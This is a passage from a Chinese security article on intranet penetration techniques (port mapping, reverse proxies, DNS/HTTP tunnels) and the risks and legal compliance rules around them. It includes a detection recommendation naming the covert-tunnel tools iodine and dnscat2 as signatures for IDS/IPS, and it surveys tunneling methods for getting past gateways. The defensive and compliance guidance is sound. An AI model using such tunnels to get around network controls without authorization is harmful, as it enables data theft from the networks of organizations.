内网穿透不是 “孤立技术”，需与网络安全设备协同，才能实现 “便捷与安全的平衡”。以下 22 种设备在穿透场景中承担不同角色，需根据实战需求适配。

四、实战避坑：内网穿透的风险与合规要点

在实际操作中，多数安全事故并非技术漏洞导致，而是 “操作不规范” 或 “忽视风险”。以下是实战中需重点规避的风险与合规要求。

1. 技术风险与规避措施

• 端口暴露风险：端口映射时使用默认端口（如 3389、22），易被黑客扫描并暴力破解。规避：使用非标准端口（如 3389→65000、22→2222），并在防火墙限制访问 IP（仅允许公司办公网 IP 访问）。
• 隧道隐蔽性风险：DNS/ICMP 隧道被黑客利用，绕过防护窃取数据。规避：在 IDS/IPS 中添加隧道协议特征库（如 iodine、dnscat2 的数据包特征），发现异常隧道立即阻断。
• 权限失控风险：VPN 账号被泄露，导致未授权人员访问内网。规避：启用双因素认证（如短信验证码、USB Key），定期清理过期账号，限制单账号的访问范围（如仅允许访问 OA）。
• 流量劫持风险：未加密的穿透流量（如 HTTP 隧道、未加密的 SSH）被中间人劫持。规避：所有穿透流量均使用加密协议（如 HTTPS、SSL VPN、SSH），避免明文传输，关键服务（如数据库）需额外加密（如 MySQL SSL）。

2. 法律合规要点

• 授权合规：必须获得目标网络所有权人的书面授权，严禁 “未授权穿透”（即使是测试自己的网络，也需内部审批）。
• 数据合规：穿透过程中传输的数据需符合《数据安全法》《个人信息保护法》，禁止传输敏感数据（如客户身份证号、银行卡信息），若需传输需加密并备案。
• 审计合规：所有穿透操作需留存日志（至少 6 个月），包括访问 IP、时间、操作内容、账号信息，满足等保 2.0 中 “安全审计” 的要求（等保二级及以上必须具备）。
• 供应商合规：使用第三方穿透工具（如花生壳、向日葵）时，需审核供应商的资质（如是否具备《网络安全等级保护备案证明》），避免数据被供应商截留。

五、实战选型的核心原则

内网穿透的 “50 种打法” 没有 “最优解”，只有 “最适合的场景解”。实战中选型需遵循以下三大原则：

1. 场景优先：根据网络环境与需求选择技术，例如：

• 网关有固定公网 IP→优先端口映射；
• 网关为对称 NAT→优先反向连接（FRP/NPS）；
• 网关仅允许 HTTP/DNS 流量→优先隧道技术（HTTP/DNS 隧道）；
• 需低延迟访问→优先 P2P 直连（WireGuard、ToDesk）。

2. 安全兜底：任何穿透方案必须搭配 “身份认证 + 权限控制 + 日志审计” 三要素，例如：

• 远程办公场景：SSL VPN（双因素认证）+ 堡垒机（日志审计）+ EDR（终端防护）；
• IoT 管理场景：MQTT 隧道（设备证书认证）+ 工业防火墙（协议过滤）+ NTA（流量分析）。

3. 合规先行：在方案设计阶段，需提前评估合规要求（如等保等级、行业规范），避免上线后因不合规被迫整改。例如：

• 金融行业：需使用国密算法（如 SM4）加密穿透流量，日志留存至少 1 年；
• 政务行业：需通过网闸实现穿透，禁止直接连接互联网。

内网穿透是一把 “双刃剑”，既能提升办公效率与运维便捷性，也可能成为网络安全的 “突破口”。实战中需牢记：技术是工具，规范是底线，只有将 “技术落地” 与 “安全合规” 深度结合，才能让内网穿透真正服务于业务，而非成为风险隐患。

推荐关注

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：HACK之道 GhostShell《实战中内网穿透的 50 种打法！》